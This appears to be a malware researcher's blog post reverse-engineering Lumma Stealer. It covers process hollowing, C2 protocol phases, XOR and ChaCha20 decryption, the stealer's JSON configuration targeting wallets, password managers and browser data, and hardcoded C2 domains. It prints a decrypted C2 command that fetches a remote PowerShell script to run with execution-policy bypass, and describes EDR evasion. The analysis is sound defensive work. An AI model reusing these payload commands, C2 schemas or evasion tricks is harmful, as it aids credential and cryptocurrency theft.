The image illustrates a classic case of process hollowing, a technique widely used by modern malware to stealthily execute arbitrary code under the guise of a legitimate process. In the scenario depicted, the initial process corresponds to the malware itself which, at this early stage, has not yet exhibited any malicious behavior and therefore appears legitimate. The malware then creates a new instance of itself (a clone of the original executable process) launched explicitly in a suspended state. It is on this newly created process that the hollowing technique is applied: the original contents are overwritten with a malicious payload, which is later executed under the identity of what appears to be an unmodified and benign executable.

The sequence begins with the creation of the suspended process using the high-level API CreateProcessW, which internally invokes the lower-level native API NtCreateUserProcess. The use of the CREATE_SUSPENDED flag (hex value 0x00000004) ensures that the primary thread of the process is created but not immediately executed. This provides a temporal window in which the attacker can modify the process's memory before any code is run. It is important to note that the order of the first three calls appears reversed due to how CAPE Sandbox logs API calls based on completion order rather than invocation order. Specifically, between NtCreateUserProcess and CreateProcessW, the sysenter instruction is observed. This instruction is used to transition directly from user mode to kernel mode and is internally employed by functions such as NtCreateUserProcess to perform system calls, enabling direct interaction with the Windows kernel.

After the process has been created, the following operations are carried out:

NtAllocateVirtualMemory is used to reserve memory space within the remote process (in this case at base address 0x00400000, with a size of 0x00059000 bytes). Notably, the protection flags include PAGE_EXECUTE_READWRITE, which allows both writing and execution within the same region (a highly suspicious condition in legitimate software contexts).
WriteProcessMemory writes a malicious payload in Portable Executable (PE) format into the allocated memory. The data observed in the image clearly resembles a PE binary, beginning with the MZ magic number (0x4D5A), and appears to be injected in multiple non-contiguous segments.
NtGetContextThread and NtSetContextThread are then used to modify the execution context of the suspended thread, specifically updating the value of the EIP (or RIP in 64-bit architectures) register, which represents the instruction pointer. This attribute of the CONTEXT struct is set to the entry point of the injected payload (0x0040ced0), so that execution resumes directly from the injected code rather than the original program logic.
NtResumeThread resumes the execution of the thread, effectively launching the malicious code under the identity of what appears to be a legitimate process.

The following image helps clarify why the child process is not explicitly unmapped during the hollowing procedure.

In this case, the malware performs process hollowing without invoking NtUnmapViewOfSection (the user-mode accessible syscall) or ZwUnmapViewOfSection (kernel-mode counterpart). The parent process, compiled with ASLR, is loaded at 0x007c0000, leaving the typical base address 0x00400000 unused in the child. This allows a direct NtAllocateVirtualMemory call at 0x00400000, avoiding the need to unmap any section. If that address had been occupied, the allocation would have failed.

This technique cleverly bypasses EDRs that rely on detecting NtUnmapViewOfSection as a signature for hollowing. Later, a small memory region is mapped via NtMapViewOfSection at 0x03460000 and quickly unmapped with NtUnmapViewOfSectionEx (a variant that allows more granular unmapping by accepting a thread handle), possibly as a decoy. An analyst might dismiss this late unmap as harmless, missing the earlier stealthy injection. Nonetheless, further investigation would reveal the full evasion strategy.

Following the sandbox analysis and identification of a process hollowing-compatible sequence, a script for x64dbg (as well as you can also find the console output) was developed to automate the tracing and memory dump of the injected payload. The script is designed to be executed once the breakpoint on the entry point of the analyzed process is reached, where the executable is loaded into memory but not yet executed.

The script works on multiple levels. First, it defeats common anti-debugging countermeasures, including the BeingDebugged flag in the Process Environment Block (PEB) structure. Next, the script sets breakpoints on a set of strategic hollowing detection APIs: CreateProcessW (create the suspended process), VirtualAlloc and VirtualAllocEx (allocate memory in the remote process address space), WriteProcessMemory (write the payload), and ResumeThread (resume the thread after injection).

Particular attention is paid to the WriteProcessMemory function. If a buffer containing the MZ signature (indicator of the header of a PE file) is detected, the script assumes that it is the malicious payload injected into the hollowed process. In this case, the handle of the process in which the injection occurred is recorded. All subsequent writes to the same handle will be recorded.

When ResumeThread is called, the script proceeds to hook the hollowed process through its Process ID, which was previously saved, and suspends execution to allow the analyst to manually dump the affected memory. I also tried to automate this step, but once the debugger hooks into the child process, it is no longer possible to execute commands in x64dbg except through the GUI console.

This approach allows to acquire the entire content of the injected payload before its execution, facilitating static analysis of the code and extraction of indicators of compromise.

Injected memory analysis

When extracting a Portable Executable (PE) file from a process's memory, the resulting dump often reflects the in-memory layout rather than the original structure on disk.

This discrepancy occurs because, in memory, slices are aligned according to page boundaries (typically 0x1000 bytes), while on disk they follow file alignment (commonly 0x200 bytes). As a result, fields such as PointerToRawData and SizeOfRawData in slice headers may not accurately match their original values.

To reconstruct a valid PE file suitable for static analysis, these fields must be realigned, ensuring that the raw addresses and sizes match the virtual addresses and sizes observed in memory. This process, described in detail in Rufus M. Brown's blog post, involves modifying the PE headers to reflect the correct mappings, facilitating effective analysis of the dumped executable.

As shown in the following image, I modified the address-related values within the “Section Hdrs” tab.

Furthermore, by examining the “Optional Hdr” tab, we can observe that the DLL Characteristics field contains the value 0x0040. This value corresponds to the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag, which indicates that the binary supports Address Space Layout Randomization (ASLR). This security feature allows the operating system to load the executable at a randomized base address, making memory-based attacks more difficult by reducing predictability.

However, in the context of malware analysis and reverse engineering, ASLR complicates debugging by randomizing the base addresses of executables and shared libraries at each execution. To maintain consistent memory layouts and simplify the analysis process, it is often necessary to disable ASLR during dynamic analysis sessions. This can be accomplished by using the editbin utility with the /DYNAMICBASE:NO option:

editbin DYNAMICBASE:NO memdump_179C_00400000_59000.bin

Both ASLR deactivation and memory realignment steps were systematically applied as preliminary operations to all analyzed samples, forming the basis for all subsequent steps of the analysis.

Communication analysis (lumma v4)

To understand the behavior of malware, especially its communication logic, it is necessary to analyze the structure and flow of its network activity. Detecting only outgoing connections is not enough; it is essential to analyze more deeply the sequence of interactions and the conditions that govern them.

This chapter analyzes two network captures obtained from CAPEv2 sandbox executions. In both cases, the sandbox is configured to redirect all outbound traffic through a controlled channel, ensuring a secure and isolated environment.

In the first scenario, all traffic is routed to INetSim, a tool that emulates common internet services (HTTP, DNS, FTP, etc.) and returns fake but consistent responses. This setup allows the malware to iterate through its list of embedded C2 domains, progressing only when a response is deemed invalid. As a result, it becomes possible to systematically enumerate all hardcoded endpoints and reconstruct the extent of the malicious infrastructure.

In the second scenario, the sandbox directs traffic through a secure proxy with real internet access. This allows the malware to complete its communication stages and retrieve live responses from its C2 server, while still preserving analyst anonymity and containment.

By comparing these two execution scenarios, it is possible to reconstruct the malware’s communication protocol in detail.

InetSim

During execution, the sample uses the WinHTTP API to initiate connections and transmit data. The following functions are observed:

WinHttpOpen – initializes a session handle
WinHttpConnect – creates a connection to a target domain over port 443
WinHttpOpenRequest – prepares an HTTP POST request to the /api endpoint with parameter act=life
WinHttpSendRequest – sends the HTTP request to the server
WinHttpReceiveResponse – receives the response from the server

The malware contacted the following domains in sequence:

pragapin.sbs
repostebhu.sbs
thinkyyokej.sbs
ducksringjk.sbs
explainvees.sbs
brownieyuz.sbs
rottieud.sbs
relalingj.sbs
tamedgeesy.sbs

Each domain is contacted via a POST /api request carrying act=life as its payload. Since INetSim provides valid HTTP-level responses (e.g., HTTP/1.1 200 OK), the malware proceeds through the full WinHTTP call chain. However, the application-layer content does not match the expected format, so the sample marks the domain as inactive and moves on.

After exhausting the predefined C2 list, the malware issues a GET request to a Steam profile:

steamcommunity.com/profiles/76561199724331900

This suggests a fallback mechanism: when no hardcoded C2 responds appropriately, the malware attempts to retrieve additional information from a third-party platform. INetSim makes it possible to capture this entire process safely and deterministically, exposing the embedded infrastructure.

Proxy

As in the previous case, the malware employs the WinHTTP API to manage outbound HTTPS requests.

In this instance, the malware attempts to contact the same list of C2 domains as in the previous execution, but does not receive valid responses. It then sends a GET request to the Steam profile page and subsequently continues communication with a new domain: marshal-zhukov.com. Important to note is that this address is not part of the original list and is likely retrieved dynamically from the Steam page.

Below is a summary of the communication flow. (HTTP headers are only shown in the first request to keep the text concise.)

Summary communication flow

`act=life`

Client

Method: POST /api

Headers:

Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Body: act=life

Server

Headers:

Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=mdd1ko4qf5gsb9idied577rfbn; Max-Age=9999999; path=/

Body: ok

`act=recive_message`

Client

act=recive_message&ver=4.0&lid=BVnUqo--@StayAway777&j=

Server A very long base64-encoded string, likely containing encrypted content.

`act=send_message` (there are multiple requests)

Client Multipart form data including the following fields:

hwid  -> T4U67W9CV4H5D63KM6SXSEX5UPD59TSK
pid   -> 2
lid   -> BVnUqo--@StayAway777
act   -> send_message
file  -> (ZIP archive, starts with PK magic number)

Server

ok [an IP address]

`act=get_message`

Client

act=get_message&ver=4.0&lid=BVnUqo--@StayAway777&j=&hwid=T4U67W9CV4H5D63KM6SXSEX5UPD59TSK

Server Another short base64-like string.

Analysis of communication phases

The presence of the act= parameter allows us to clearly distinguish four distinct phases within the communication protocol:

act=life: likely a simple reachability check, as suggested by the minimal response (ok).
act=recive_message: possibly a registration step. The server responds with a long base64 string, which could contain configuration or commands information.
act=send_message: the malware sends exfiltrated data. The presence of a ZIP file header (PK) indicates structured, possibly compressed, data theft.
act=get_message: the malware may receive additional commands. The format is similar to stage 2 but shorter.

In addition, the presence of the ver=4.0 argument may suggest that the malware communicates its current version to the server for identification purposes. For the time being, we refer to this version as version 4.

At this point, the structure of the protocol is partially understood. However, the actual content of the base64 responses remains unreadable after decoding. This suggests that the data may be encrypted after base64 encoding or that a custom base64 alphabet is used.

To confirm this, it is necessary to reverse engineer the malware and analyze the runtime behavior of the relevant decoding and decryption routines.

Prerequisites for Advanced Analysis

To support the analysis workflow, a local HTTPS server was configured to emulate the malware’s C2 communication. This is especially useful in advanced stages, where original C2 servers are often offline. Lumma Stealer domains tend to be short-lived, making repeatable analysis unreliable without such setup.

The first contacted domain, according to captured traffic, is pragapin.sbs. To maintain continuity, the server was configured to respond under this domain, replaying payloads previously received from marshal-zhukov.com.

The environment was set up using the following steps:

Generate the HTTPS certificate:

& 'C:\Program Files\OpenSSL-Win64\bin\openssl.exe' req -x509 -nodes -days 365 -newkey rsa:2048 -keyout pragapin.sbs-key.pem -out pragapin.sbs-cert.pem

Install and trust the certificate on Windows:
- Open Microsoft Management Console (mmc.exe)
- Add the "Certificates" snap-in for both Current User and Local Computer
- Navigate to: Trusted Root Certification Authorities > Certificates
- Right-click > All Tasks > Import
- Import the previously generated pragapin.sbs-cert.pem file
Redirect the C2 domain locally: Add the following entry to the system's hosts file C:\Windows\System32\drivers\etc\hosts:
```
127.0.0.1 pragapin.sbs
```

To verify that the custom HTTPS server correctly handles malware communication, the analysis was complemented with a debugger script for x64dbg. This script automates the placement of breakpoints on key WinHTTP functions involved in network communication, such as WinHttpOpen, WinHttpConnect, WinHttpOpenRequest, WinHttpSendRequest, and WinHttpReceiveResponse.

Since winhttp.dll is loaded dynamically, breakpoints cannot be placed at the start of execution. Guided by the CAPEv2 trace, which confirmed the use of the WinHTTP API, the script monitors calls to LoadLibraryExW and sets breakpoints only after detecting the load of winhttp.dll.

This setup provides a clean and reproducible environment to monitor API-level interactions and verify that the malware follows the expected communication flow with the emulated C2.

Second stage analysis

Identifying the decryption routine

I begin analyzing the second stage by opening the memory-dumped binary obtained from the first phase directly in Ghidra. The image I create summarizes the logical path I follow during this investigation. Since the malware is deeply obfuscated and requires several debugger sessions, the flow is not strictly linear. Rather, it combines the most relevant insights collected across multiple executions.

On the left side of the disassembly, I identify the binary’s entry point. The code is heavily obfuscated, so I choose to ignore most of the surrounding instructions and focus on segments that can be linked to the malware's communication behavior. In the previous section, I have already identified four main stages in the communication process, so my goal is to find a function that includes all of them. This helps me drastically narrow down the analysis scope.

I first examine the function at address 0x40e0b0. It only performs the initial reachability check to determine whether the C2 server is active. Since it does not handle any of the remaining communication stages, I move on.

By following the control flow beyond the function at 0x40f920, I notice that no additional network-related calls are made. This observation leads me to the key target of the second stage analysis: the function located at 0x410aa0, which appears to handle all the remaining three stages of the communication protocol.

As soon as this function starts, it invokes another subroutine at address 0x436130, which performs a series of preparatory operations:

initializes internal components
issues a WQL query with SELECT * FROM Win32_BIOS to enumerate BIOS information
retrieves the system’s serial number
calls GetVolumeInformationW
performs a series of chained calls that finally generate the value used in the communication as hwid, a 32-byte hardware identifier

Following this, another value is accessed from the .rodata section. This is the lid, and unlike other hwid identifier, it is not generated dynamically. It is directly read from a read-only memory, indicating that it is hardcoded. Given that Lumma Stealer follows a Malware-as-a-Service (MaaS) distribution model, it is reasonable to assume that the lid parameter serves as a unique identifier for the customer or affiliate who acquired the stealer. In MaaS ecosystems, such identifiers are typically used to associate infections and activity logs with specific clients, enabling usage tracking, build differentiation, or revenue attribution.

Still within the .rodata section, I find additional unusual strings. One of these is passed directly to the function at address 0x436dc0, suggesting that this call is responsible for some form of transformation or possibly cryptographic processing. This part of the code, renamed lumma_decryption(), becomes the focus of the next phase of the investigation.

Understanding the Decryption Logic

I created the following image to summarize the logical path and provide a detailed view of the decryption routine lumma_decryption().

This function accepts an encrypted buffer as input and writes the output to a second buffer passed as an argument. As shown on the left side of the image, the function begins by calculating the length of the encrypted input and then estimates the length of the decoded output.

Immediately afterward, the function invokes a decoding subroutine. Given the structure of the ciphertext, I initially suspected that it performed Base64 decoding. To validate this hypothesis and rule out the use of custom alphabets, I extracted the relevant pseudocode as presented by Ghidra, applied some manual adjustments, and reimplemented it in Python. The complete script is available here.

I then performed a one-to-one comparison between this Python implementation and the output of Python’s standard Base64 decoding function. The results are identical for all hardcoded strings extracted from the binary. This confirms that the decoding routine is just Base64.

Returning to the main decryption function, the next operation copies the first 32 bytes of the decoded buffer into a dedicated memory region, which serves as the decryption key. Following this, the len variable is reduced by 32, and data_pointer is updated to point precisely to the beginning of the payload + 32 bytes.

The bottom part of the function, highlighted in red in the image, contains the loop that performs the actual decryption. As before, I converted this logic into a standalone Python script for clarity. The complete script is available here.

To ensure the correctness of the analysis, I systematically compared the translated logic against a standard implementation of a block-wise XOR operation using a 32-byte key. In order to eliminate potential edge cases, I developed two nested loops designed to exhaustively iterate over all possible input combinations and verify that the outputs remained consistent across both implementations. The results of this comparison confirm the functional equivalence of the two routines.

This method echoes the principle of duck typing: if it acts like an XOR cipher, outputs like an XOR cipher, and structurally matches an XOR cipher, then we can reasonably conclude it is one.

Finally, the output strings produced by this decryption process are indeed the C2 domains used by the malware.

Reusing the C2 Decryption Logic in Communication Decryption

By simulating the HTTPS server response from pragapin.sbs, as detailed in the section "Prerequisites for Advanced Analysis", I am able to observe how the malware processes and decrypts the data received in response to the recive_message and get_message commands.

As shown in the first figure below, after the WinHttpReceiveResponse and WinHttpReadData calls, the downloaded content is stored in a buffer. This buffer is then passed as the first argument to the same decryption function, lumma_decryption(), which was previously identified and analyzed in the static phase of the research.

This provides strong evidence that the decryption routine used to extract hardcoded C2 domains is repurposed during runtime to decode encrypted payloads received from the C2 infrastructure.

In the second figure, I confirm that the decrypted buffer produces a valid and well-structured JSON response, suggesting that this routine is consistently applied to multiple encryption layers within Lumma Stealer's architecture.

To further demonstrate the correctness of the decryption logic, I reimplement and generalize the routine in Python. At the following link, both the function and the resulting outputs are provided.

Analysis of Decrypted C2 Responses

The decrypted payload returned by the recive_message command reveals a rich JSON structure containing detailed instructions for data collection, as well as a full list of browser extensions and targets of interest. The structure is divided into three main sections: ex, mx, and c.

ex (Extension List): This array lists numerous browser extensions, mostly cryptocurrency wallets (e.g., MetaMask, Ronin Wallet, Trust Wallet, Coinbase, OKX), password managers (e.g., LastPass, Bitwarden, 1Password), and authentication tools (e.g., Authy, EOS Authenticator, GAuth). Each entry includes a unique identifier (en, likely the Chrome extension ID) and a human-readable name (ez). The presence of multiple entries for the same wallet (e.g., MetaMask appears twice with different IDs) suggests that the stealer is designed to recognize variants or clones of popular extensions.
mx (Meta Instructions): This field appears to provide specific targeting instructions for selected extensions. For example, the entry for MetaMask includes an et parameter with password derivation settings (iterations = 600000), which could be used for brute-force attacks or validating password-protected vaults offline. This section can be customized for high-value targets that require special handling.
c (Collection Rules): This is the most operational part of the structure. Each object specifies:
- target path (p) – often %appdata% or %localappdata% directory
- match pattern (m) to filter specific files (e.g., keystore, *.sqlite)
- exfiltration folder (z) on the attacker's side (e.g., Wallets/Ethereum)
- collection depth or method (d)
- maximum file size (fs in bytes, typically 20 MB)

These rules clearly indicate the intent to exfiltrate cryptocurrency wallet files, browser session data, and configuration files from FTP/VPN/email clients. Special attention is also paid to password managers and generic user profiles, where sensitive credentials or seed phrases may be stored.

The response to the get_message command is significantly simpler, consisting of a URL pointing to a PE executable (conhost.exe) hosted on a remote server. This implies that the bot can receive follow-up stages via this channel, possibly to update itself, distribute a payload, or activate specific modules.

Enrichment of the analysis

To better understand the structure of the decrypted C2 responses used by Lumma Stealer, I analyzed and decrypted the network traffic of dozens of real-world samples. I observed that the response returned by the C2 server to the recive_message command remained consistent across all cases, while the get_message response varied dynamically depending on the execution context.

During this process, the blog post published by SpyCloud was particularly helpful. It initially confirmed several of my assumptions and later provided additional technical insights that helped refine and complete the interpretation of each field.

The insights gained through this combined approach allowed me to formally define the following generalized schema:

recive_message

{
  "v": 4,
  "se": true,   // take a screenshot
  "ad": false,  // delete self
  "vm": false,  // language check

  // it's not checked if the browser is present and the extensions are sought for all browsers
  "ex": [       // browsers extension target
    {
      "en": "...",  // extension address
      "ez": "...",  // extension name
      "ldb": true,  // optional: levelDB -> used in Coinbase
      "ses": true   // optional: session -> used for OTP authenticators
    }
  ],
  "mx": [
    {
      "en": "webextension@metamask.io",           // extension address (Firefox)
      "ez": "MetaMask",                            // extension name
      "et": "\"params\":{\"iterations\":600000}"   // something related to encryption?
    }
  ],
  "c": [
    {
      "t": 0,        // Steal_Clients
      "p": "...",    // path to steal from
      "m": ["..."],  // file extensions to steal
      "z": "...",    // output dir to store stolen data
      "d": 1,        // recursion depth level
      "fs": ...      // maximum file size
    },
    {
      "t": 1,        // Steal_Chromium_data (Chromium-based)
      "p": "...",    // path to steal from
      "z": "...",    // output dir to store stolen data
      "f": "...",    // browser name
      "n": "...",    // browser executable (for injection?)
      "l": "..."     // browser DLL (for injection?)
    },
    {
      "t": 2,        // Steal_Mozilla_data (Mozilla-based)
      "p": "...",    // path to steal from
      "z": "..."     // output dir to store stolen data
    },
    {
      "t": 4,        // Steal_Registry_data
      "p": "...",    // registry key path
      "v": "...",    // value name
      "z": "..."     // output file to store stolen data
    }
  ]
}

get_message

[
    {
        "ft": ..., // 0 = exe = executed with CreateProcessW
                   // 1 = dll = loaded
                   // 2 = ps1 = exected with powershell -exec bypass ”%s”
        "e": ...,  // 0 = execution behavior = LoadLibraryW
                   // 1 = execution behavior = rundll32.exe
        "d": ...,  // base64 payload data
        "u": ...,  // url where the next step is stored
    }
]

Dropped file decryption

As a concrete example, I refer to the analysis available at Any.Run, from which I extracted the decrypted content of the get_message response. The response, structured as a JSON array, includes a PowerShell script reference hosted remotely as well as an embedded payload still encoded in Base64 format:

[
    {
        "u": "https://arting.ee/cgi-bin/netsup_clean.ps1",
        "ft": 2,
        "e": 0
    },
    {
        "ft": 1,
        "e": 1,
        "d": "base64 string ..."
    }
]

Without further reversing the code responsible for decrypting these payloads, I reused the previously lumma_decryption() routine. The decrypted output of the Base64 string immediately revealed a valid PE file, which is indicated by the presence of the standard MZ and PE headers:

MZ\x00\x01\x00...This program cannot be run in DOS mode...PE\x00\x00...

When saved as dropped.dll and examined with the file utility, the output confirmed its nature:

dropped.dll: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

At the time of analysis, the hashes of the dropped DLL were not associated with any known samples in public threat intelligence databases:

SHA256: d795aeec6dedacf10f82dd31d69ea...
MD5: 250098f7c58e2290a2056e00d0c5127b

This finding further confirms that Lumma Stealer can deliver new stages through encrypted get_message responses.

Data Exfiltration

Through experimental analysis, it was observed that Lumma Stealer transmits the exfiltrated data in the form of ZIP archives (identified by the magic number PK) using multiple send_message requests. Each request differs by a single parameter: pid, which appears to categorize the exfiltration phase or the type of data sent. This pid field effectively serves as a tag or classification label that helps organize the stolen information into logical groups.

Still using the HTTPS server discussed in the previous sections, the following ZIP files were recovered, each corresponding to different pid values:

Chrome data — pid=2

 inflating: Chrome/dp.txt
 inflating: Chrome/Default/History
 inflating: Chrome/Default/Login Data
 inflating: Chrome/Default/Login Data For Account
 inflating: Chrome/Default/Network/Cookies
 inflating: Chrome/Default/Web Data
 inflating: Chrome/ab.txt
 inflating: Chrome/BrowserVersion.txt

Edge data — pid=2

 inflating: Edge/dp.txt
 inflating: Edge/Default/History
 inflating: Edge/Default/Login Data
 inflating: Edge/Default/Web Data
 inflating: Edge/BrowserVersion.txt

Firefox data — pid=3

 inflating: Mozilla Firefox/fqs92o4p.default-release/key4.db
 inflating: Mozilla Firefox/fqs92o4p.default-release/cert9.db
 inflating: Mozilla Firefox/fqs92o4p.default-release/cookies.sqlite
 inflating: Mozilla Firefox/fqs92o4p.default-release/places.sqlit

User “Important Files” (e.g., .txt files on Desktop) — pid=1
Software inventory and process list (e.g., Software.txt, Processes.txt) — pid=1
System information (e.g., System.txt, optionally Clipboard.txt, and Screen.png) — pid=1

By analyzing network traffic collected from public sandboxes and from controlled local executions, in which specific softwares was installed to reflect the targets defined in the configuration received via the recive_message command, I was able to identify three main exfiltration categories associated with the pid parameter:

pid=2: data from Chromium-based browsers and associated crypto or 2FA extensions
pid=3: data from Mozilla Firefox and associated crypto or 2FA extensions
pid=1: general system and user profiling (including screenshots, clipboard data, process lists, and sensitive documents)

This behavior suggests that Lumma Stealer adopts a modular approach to data exfiltration, where each category of information is sent in a separate and ordered way. This structure likely helps reduce the risk of detection and improves the reliability of the operation.

Dynamic retrieve of new C2s

During analysis of LummaC2 network traffic, it was observed that the malware contacts legitimate web services to retrieve additional information needed to continue its execution. One notable example involves accessing a Steam profile hosted at steamcommunity.com/profiles/76561199724331900, which returned a public page containing the username xlcdslw-ksfvzg.nzx.

Initially, the string xlcdslw-ksfvzg.nzx did not correspond to any known domain or recognizable token. However, its fully alphabetic composition and domain-like structure suggested it was lightly obfuscated rather than strongly encrypted. By comparing the ciphertext with the decrypted result present in the network traffic marshal-zhukov.com, it became clear that each character in the ciphertext corresponds to a plaintext character at a fixed distance of 15 positions in the alphabet. For example:

ciphertext “x” maps to plaintext “m” (a backward shift of 15)
ciphertext “l” maps to plaintext “a” (again a shift of 15)
...

To validate this hypothesis, all possible Caesar rotations (ROT-1 to ROT-25) were tested using a brute-force script that systematically applies each rotation and looks for the marshal-zhukov.com domain in the output. Here is the script and the output that confirms the use of ROT-15.

Update 10/01/2025: Changed hardcoded domains decryption

Introduction

The following technical analysis focuses on a sample of Lumma Stealer retrieved from the MalwareBazaar platform. All the techniques previously described in this blog post were applied to this variant. For the sake of brevity, this section will focus exclusively on the differences and new findings specific to this sample.

Since the communication mechanism remained unchanged in this version, the update was not analyzed immediately. A more in-depth investigation was carried out only after March 6, 2025. As a result, some traces of the subsequent update (such as the appearance of the uid string) are already present in this analysis. For clarity and consistency, these elements will only be mentioned briefly here and will be discussed in detail in the appropriate section dedicated to the newer version.

Dynamic analysis

By running the new sample in CAPEv2 with INetSim enabled, I was able to easily extract the command and control (C2) domains used by the malware.

The first HTTP request is always made to the Telegram endpoint t.me/asdawfq, which is used to dynamically fetch a new C2 domain. The next requests, which represent the hardcoded C2s in the malware itself, are:

astralconnec.icu/DPowko
begindecafer.world/QwdZdf
garagedrootz.top/oPsoJAN
modelshiverd.icu/bJhnsj
arisechaird.shop/JnsHY
catterjur.run/boSnzhu
orangemyther.live/IozZ
fostinjec.today/LksNAz
sterpickced.digital/plSOz

Finally, two additional requests are directed to steamcommunity.com/profiles/76561199822375128, which appears to serve as a fallback mechanism for dynamically retrieving C2 domains if the Telegram-based method fails.

This behavior shows a major change in how C2 endpoints are contacted. Instead of always using the static /api path as in earlier versions, the new variant uses dynamic and unpredictable URLs. This is likely intended to evade pattern-based detection mechanisms.

Identifying the decryption routine

The image below illustrates the logical flow that led to the identification of a new decryption function in the analyzed Lumma Stealer sample.

Until the call to the function at address 0x40da90, the malware exclusively attempts to contact legitimate services such as Telegram or Steam, with the goal of dynamically retrieving updated C2 domains. From this point onward, execution continues into the function located at 0x4113b0, which immediately invokes a subroutine at 0x411770.

This subroutine retrieves the string uid, which, like the lid string previously observed, is hardcoded in the .rdata section of memory.

Next, the function decodes the string Content-Type: application/x-www-form-urlencoded and proceeds to call a subroutine at 0x40ef00, responsible for de-obfuscating the user agent string. Following this step, the malware invokes the standard Windows API WinHttpOpen() and then calls another function at 0x40fdc0, which prepares the necessary arguments before making a final call to the function at 0x40cd20. For clarity, we refer to this last function as lumma_new_decryption().

The function receives four arguments:

a pointer to an initialization structure containing the string expand 32-byte k
a pointer to a buffer that appears to be ciphertext, presumably the input to be decrypted
a second buffer that is likely used as output
the length of the input buffer

Notably, the second argument points to the .rdata section, indicating that it likely contains hardcoded and encrypted domain names, as previously observed in earlier stages of the analysis.

Understanding the Decryption Logic

Salsa20 and Chacha20

Salsa20 is a stream cipher designed by Daniel J. Bernstein in 2005. It operates on a 512-bit internal state structured as a 4×4 matrix of 32-bit words. The matrix includes a 256-bit key, a 64-bit nonce, a 64-bit counter, and a 128-bit constant: "expand 32-byte k".

This ASCII string is split into four 32-bit words and inserted into the matrix to distinguish the 256-bit key setup. For 128-bit keys, the constant "expand 16-byte k" is used instead. The constant ensures unambiguous initialization and avoids collisions between different key lengths.

The cipher applies 20 rounds of simple operations (modular addition, XOR, and rotation) to generate the keystream.

ChaCha20 is a modified version of Salsa20 that retains the same input structure (including the "expand 32-byte k" constant) but changes the round function for better diffusion and resistance to attacks. It is now widely adopted in modern cryptographic protocols.

Both Salsa20 and ChaCha20 initialize a 4×4 state matrix using the constant string "expand 32-byte k", followed by the key, a counter, and a nonce. The key difference is in the placement of the counter and nonce:

Salsa20 places the counter in the middle and the nonce in the upper-right.
ChaCha20 places the counter in the lower-left and the nonce in the lower-right.

Chacha20 proof

As shown in the following image, the memory dump observed during the analysis matches the ChaCha20 layout, including the constants, key, counter, and nonce positions. This strongly suggests the function implements ChaCha20.

An important clarification: the presence of an 8-byte nonce and an 8-byte counter indicates that this corresponds to the original ChaCha20 construction, not the modern standardized variant defined in RFC 8439, which specifies a 12-byte nonce and a 4-byte counter.

To confirm that the lumma_new_decryption() function actually implements the ChaCha20 cipher, the encrypted data observed in memory was transferred to Python and decrypted using the official ChaCha20 library implementation. As shown in the previously referenced image, the function is invoked with four arguments: an initialization structure (containing the string expand 32-byte k), the ciphertext buffer, an output buffer, and the ciphertext length. A key detail to note is that, at the time the screenshot is taken, the internal counter is set to 2.

Since ChaCha20 is a stream cipher whose keystream generation is sensitive to the internal block counter, it was necessary to simulate multiple decryption cycles to automatically increment the internal counter. This Python script illustrates this approach. When the decryption routine is invoked the second time (counter=2), the plaintext is recovered correctly, revealing the expected C2 domain astralconnec.icu/DPowko.

This experiment provides strong evidence that the function under analysis implements the ChaCha20 algorithm.

Update 06/03/2025: Changed communication protocol = lumma v6.3

Introduction

The release of Lumma Stealer version 6.3 introduced significant changes to the malware's C2 communication protocol. At first glance, the structure of the interaction appears significantly altered compared to the previous version.

One of the most noticeable changes is the removal of the act parameter, which previously made it easier to identify and differentiate the different communication phases. Additionally, the initial act=life step (used in previous versions as a sort of "ping" of the server) has been removed. Communication now starts directly with what was previously known as act=recive_message, presumably to be more stealthy.

The updated structure of the three steps of the malware's C2 protocol can be summarized as follows:

recive_message:
- Client-side parameters: uid=...&cid=... The uid parameter likely serves as a unique identifier for the client that has purchased access to the Malware-as-a-Service (MaaS) infrastructure, replacing the previous lid field.
Server response: Encrypted data, now using a new encryption scheme (discussed in the following sections).
send_message:
- Client-side payload: Form data containing uid, pid, hwid, and a file encrypted using the new scheme.
- Server Response: JSON confirmation message indicating successful delivery of data, e.g. {"success":{"message":"message success delivery from [IP-ADDR]"}}.
get_message:
- Client-side parameters: uid=...&cid=...&hwid=...
- Server Response: Encrypted data retrieved using the new encryption scheme.

Although the format of the communication has been obfuscated, its logical structure remains largely intact. The protocol still clearly separates the three main phases of the interaction. However, to identify whether a message matches recive_message or get_message, it is now necessary to check for the presence or absence of the hwid parameter.

In the next sections I will look in detail at the new encryption scheme and all the various changes it brings.

Retrieve configuration and commands

To replicate and analyze the behavior of the sample, I again captured the entire communication flow using CAPEv2 and implemented a Python HTTPS server that replayed, byte-for-byte, the responses associated with the recive_message and get_message commands, as observed during the dynamic analysis.

What makes this step of the analysis particularly noteworthy is that the execution path again reaches the lumma_new_decryption() function, previously discussed in detail. However, unlike the previous case involving the decryption of hardcoded C2 domains, the decryption mechanism now features a crucial difference: both the key and the nonce are directly derived from the ciphertext itself. This design choice is not entirely new in the context of Lumma Stealer; in fact, if we think about the previous version of the malware, where the XOR decryption key (32 bytes) was located at the beginning of the ciphertext.

In the following image, the right terminal shows the output of the script used to emulate the responses recorded by CAPEv2, while the left shows x64dbg pausing just before the call to lumma_new_decryption(). As highlighted, the first 32 bytes of the payload are extracted and used as the encryption key, followed by 8 bytes used as the nonce. The counter, however, is set to zero since the ciphertext is initialized for each ciphertext.

All the previous deductions regarding the ChaCha20-based decryption routine remain valid, with the only difference being the way the ciphertext is initialized. The decryption method just discussed applies to responses received from both recive_message and get_message. To validate this behavior, I implemented a Python script that replicates the decryption logic.

Exfiltrate stolen data

Dynamic analysis shows that the data exfiltration phase has also been updated: in fact, unlike previous versions, the ZIP file is no longer visible in clear text within the traffic, but is encrypted in some way.

Once again we return to the invocation of the same function lumma_new_decryption(), which in this context is used to encrypt (and not decrypt) the data to be sent. It is worth remembering that ChaCha20 is a symmetric stream cipher: it uses the same algorithm for both encryption and decryption. In fact, ChaCha20 applies a XOR operation between the data to be encrypted and a pseudo-random stream generated from a key and a nonce.

The image below clearly highlights the parameters provided as input to the function.

The second argument, corresponding to the buffer to be encrypted, contains a ZIP archive, as confirmed by the presence of the magic number PK. This suggests that the structure of the exfiltrated file has not been altered by this update: what changes is only the way the content is protected through encryption.

The first parameter instead shows the initialization of the cipher, containing the key and the nonce used to generate the ChaCha20 stream.

